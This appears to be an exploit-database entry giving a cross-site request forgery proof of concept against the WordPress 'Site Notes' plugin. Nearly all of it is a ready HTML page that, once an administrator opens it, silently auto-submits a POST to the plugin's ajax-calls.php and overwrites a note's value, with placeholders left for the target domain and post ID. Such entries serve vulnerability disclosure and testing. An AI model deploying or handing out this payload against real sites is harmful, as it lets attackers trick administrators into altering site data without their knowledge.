Share
## https://sploitus.com/exploit?id=WPEX-ID:EB983D82-B894-41C5-B51F-94D4BBA3BA39
Have an administrator open the following HTML file:

<html>
  <body>
    <form action="http://<TARGET-DOMAIN>/wp-content/plugins/site-notes/ajax-calls.php" method="POST">
      <input type="hidden" name="meta" value="note" />
      <input type="hidden" name="id" value="<POST_ID>" />
      <input type="hidden" name="value" value="DELETEALL!!" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>